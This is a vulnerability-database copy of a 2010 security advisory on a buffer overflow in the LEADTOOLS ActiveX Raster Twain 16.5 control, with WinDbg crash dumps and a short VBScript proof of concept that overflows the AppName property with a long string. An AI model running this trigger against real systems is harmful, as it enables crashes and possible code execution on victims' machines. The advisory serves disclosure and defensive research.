Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLiquidWormPACKETSTORM:93252
HistoryAug 28, 2010 - 12:00 a.m.

LEADTOOLS ActiveX Raster Twain 16.5 Buffer Overflow

2010-08-2800:00:00
LiquidWorm
packetstormsecurity.com
22
JSON
`  
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC  
  
  
Vendor: LEAD Technologies, Inc.  
Product Web Page: http://www.leadtools.com  
Affected Version: 16.5.0.2  
  
Summary: With LEADTOOLS you can control any scanner, digital camera  
or capture card that has a TWAIN (32 and 64 bit) device driver.  
High-level acquisition support is included for ease of use while  
low-level functionality is provided for flexibility and control in  
even the most demanding scanning applications.  
  
Desc: The Raster Twain Object Library suffers from a buffer overflow  
vulnerability because it fails to check the boundry of the user input.  
  
  
Tested On: Microsoft Windows XP Professional SP3 (EN)  
Windows Internet Explorer 8.0.6001.18702  
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)  
  
  
===============================================================  
  
(2c4.2624): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000  
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
ntdll!wcscpy+0xe:  
7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=????  
0:000> g  
(2c4.2624): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041  
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
ntdll!RtlpNtMakeTemporaryKey+0x6a74:  
7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??  
  
==================================================================  
  
  
Registers:  
--------------------------------------------------  
EIP 7C912F4E  
EAX 00130041  
EBX 100255BC -> 10014840 -> Asc: @H@H  
ECX 01649000  
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EDI 00000000  
ESI 0013EF6C -> BAAD0008  
EBP 0013EDA8 -> 0013EDDC  
ESP 0013EDA8 -> 0013EDDC  
  
--  
  
EIP 7C96C540  
EAX 00410039  
EBX 00410039  
ECX 00150000 -> 000000C8  
EDX 00150608 -> 7C97B5A0  
EDI 00410041  
ESI 00150000 -> 000000C8  
EBP 0013F228 -> 0013F278  
ESP 0013F220 -> 00150000  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+16 00000000  
EBP+20 0013EF6C -> BAAD0008  
EBP+24 100255BC -> 10014840 -> Asc: @H@H  
EBP+28 0013EDB8 -> 00000000  
  
--  
  
EBP+8 00150000 -> 000000C8  
EBP+12 00410039  
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap  
EBP+20 00000000  
EBP+24 00410041  
EBP+28 7C80FF12 -> 9868146A  
  
  
CompanyName LEAD Technologies, Inc.  
FileDescription LEADTOOLS ActiveX Raster Twain (Win32)  
FileVersion 16,5,0,2  
InternalName LTRTNU  
LegalCopyright © 1991-2009 LEAD Technologies, Inc.  
OriginalFileName LTRTNU.DLL  
ProductName LEADTOOLS® for Win32  
ProductVersion 16.5.0.0  
  
  
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: False  
  
  
Exception Code: ACCESS_VIOLATION  
  
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)  
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)  
  
  
Exception Code: BREAKPOINT  
  
Disasm: 7C90120E INT3 (ntdll.dll)  
  
Seh Chain:  
--------------------------------------------------  
1 7C839AC0 KERNEL32.dll  
2 FC2950 VBSCRIPT.dll  
3 7C90E900 ntdll.dll  
  
  
7C912F4E MOV [ECX],AX <--- CRASH  
7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH  
7C90120F RETN <--- CRASH  
  
  
==================================================================  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
Zero Science Lab - http://www.zeroscience.mk  
  
24.08.2010  
  
  
Zero Science Lab Advisory ID: ZSL-2010-4960  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php  
  
  
  
PoC:  
  
  
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"  
prototype = "Property Let AppName As String"  
memberName = "AppName"  
progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"  
argCount = 1  
  
arg1=String(9236, "A")  
  
target.AppName = arg1  
  
</script>  
`
JSON